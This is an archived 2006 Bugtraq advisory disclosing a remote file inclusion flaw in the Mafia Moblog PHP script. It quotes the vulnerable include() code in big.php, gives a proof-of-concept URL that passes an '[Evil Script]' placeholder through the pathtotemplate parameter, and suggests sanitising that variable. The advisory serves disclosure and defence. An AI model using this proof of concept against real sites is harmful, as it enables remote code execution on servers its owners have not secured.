Bugtraq mailing list archives
Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability
From: sh3ll () sh3ll ir
Date: 10 Aug 2006 13:06:23 -0000
------------------------------------------------------------------------------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll.ir Contact : sh3ll[at]sh3ll[dot]ir ------------------------------------------------------------------------------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Mafia Moblog version : 6 Venedor : http://mafia.pearlabs.org Class : Remote File Inclusion Risk : High Summary : A Free, Fully Customizeable, Open-Source MoBlog script that will run on any platform that is PHP and MySQL compatible. ------------------------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ The problem exists is in the big.php when used the variable $pathtotemplate in a include() function without being Declared. ----------------------------------------big.php-------------------------------------------- ... <?php include("info.php"); include("template.php"); if (file_exists("$pathtotemplate/includes.php")) {include("$pathtotemplate/includes.php");} include("$pathtotemplate/big.php"); ?> ... ------------------------------------------------------------------------------------------- PoC: ~~~ http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $pathtotemplate in big.php ------------------------------------------------------------------------------------------- Note: ~~~~ venedor contacted, but no response. so do a dirty patch. ------------------------------------------------------------------------------------------- Shoutz: ~~~~~~ ~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
Current thread:
- Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability sh3ll (Aug 10)
- <Possible follow-ups>
- Re: Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability noname (Aug 14)